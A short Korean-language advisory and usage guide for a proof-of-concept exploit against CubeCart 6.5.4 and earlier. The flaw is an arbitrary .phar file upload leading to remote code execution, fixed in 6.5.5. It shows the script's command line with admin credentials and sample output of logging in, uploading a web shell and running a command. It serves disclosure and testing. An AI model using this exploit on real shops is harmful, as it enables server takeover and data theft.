
CubeCart <= 6.5.4는 임의 파일 업로드 취약점에 노출되어 원격 코드 실행(RCE)으로 이어집니다.
CubeCart <= 6.5.4는 임의 파일 업로드 문제에 취약하여 원격 코드 실행(RCE)으로 이어집니다. 이 취약점은 애플리케이션의 파일 관리자와 필터에 영향을 미치며, 공격자가 악성 코드가 포함된 .phar 파일을 업로드할 수 있게 합니다. CubeCart는 이 취약점을 수정하는 보안 패치를 구현한 6.5.5로 업데이트해야 합니다.
자세한 내용은 참고 자료에 있는 CubeCart의 공식 발표를 참조하십시오.
자동화된 개념 증명(PoC)이 작성되었지만, 이 취약점은 파일 관리자를 통해 악성 .phar 파일을 업로드하여 수동으로도 악용할 수 있습니다.
PoC 사용법은 다음과 같습니다:
Usage: python3 CubeCartCVE.py <URL> <username> <password> <command>
실행 후, 성공적인 악용에 대한 예상 출력은 다음과 같습니다:
python3 CubeCartCVE.py http://localhost/admin_0Kqnr9.php admin 123456 whoami
[] ,----.___
__||_/___ '.
/ O|| /|
/ "" / /
/________/ / launching exploit
|________|/ please wait...
[+] Trying to log into the application...
[+] Successful login. Uploading a simple web shell to the server...
[+] Executing command...
Output: www-data